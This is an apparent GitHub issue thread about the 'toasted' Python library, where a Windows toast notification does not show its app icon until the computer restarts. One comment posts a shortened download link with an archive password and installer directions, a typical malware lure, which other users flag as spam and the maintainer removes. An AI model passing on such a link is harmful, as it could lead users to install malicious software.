### ISSUE TITLE
App icon not showing in toaster?

### ISSUE THREAD

**Issue by ItsCubeTime** [ysfchn/toasted#5]
Following snippet:
```py
import toasted, pathlib, contextlib, threading, asyncio
class data:
    appID="foobarSystems.foobarApp"
    appName="Foo Bar App"
    appIcon=str(pathlib.Path(__file__).absolute().parent/'icon.ico').replace('\\','/')
APP_ID = None

def getAppId():
    global APP_ID
    if APP_ID:
        return APP_ID
    APP_ID=registerApp()
    return APP_ID

def registerApp():
    with contextlib.suppress(Exception):
        toasted.Toast.unregister_app_id(data.appID)
    toasted.Toast.register_app_id(
        handle = data.appID,
        display_name = data.appName,
        icon_uri = data.appIcon
    )
    global APP_ID
    return data.appID

def sendToasterNotification(title:str="", message: str=""):
    toast = toasted.Toast(
        app_id = getAppId()
    )
    toast.elements = [
        toasted.Text(title),
        toasted.Text(message)
    ]
    threading.Thread(target=lambda: asyncio.run(toast.show())).start()
print(f"""\
data.appID:   {data.appID}
data.appName: {data.appName}
data.appIcon: {data.appIcon}""")
sendToasterNotification("Hello", "there")
```
With the following file next to above script (github wouldnt let me attach an `.ico`, so you will need to extract the `.zip`):
[icon.zip](https://github.com/user-attachments/files/16765633/icon.zip)

Results in the following toaster:
![image](https://github.com/user-attachments/assets/6c59dc32-0288-4ddb-b644-cabf86ac7744)

And the following text printed in terminal:
```
python -u "c:\Users\olliv\Desktop\TimeGuardian\TimeGuardian\veryToasty.py"
data.appID:   foobarSystems.foobarApp
data.appName: Foo Bar App
data.appIcon: c:/Users/olliv/Desktop/TimeGuardian/TimeGuardian/icon.ico
```

###  ❓ Shouldnt the icon appear in the top left of the toaster?

**Comment by ItsCubeTime** [comment]
Or is something wrong with my text icon (would appreciate if someone could test this with an icon they know is perfectly valid because Im not 100% certain mine is!)?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ItsCubeTime** [comment]
@c0ffincolors Hi, I believe your account may have become compromised. I would recommend changing your password as quickly as possible!

**Comment by ysfchn** [comment]
Does it still happen after you restart your computer after registering the app ID?

I also removed that comment, thanks.

**Comment by ItsCubeTime** [comment]
I havent restarted my device since first testing it out, no.

I will try later 👍

**Comment by ItsCubeTime** [comment]
> Does it still happen after you restart your computer after registering the app ID?
> 
> I also removed that comment, thanks.

Yeah the icon shows fine after restarting! I guess this is a limitation with Windows as opposed to the library then?

**Comment by ysfchn** [comment]
> Yeah the icon shows fine after restarting! I guess this is a limitation with Windows as opposed to the library then?

I guess so, but there is a issue #4 for suggesting to create keys as volatile on Windowd Registry, so maybe this can resolve some potential problems.
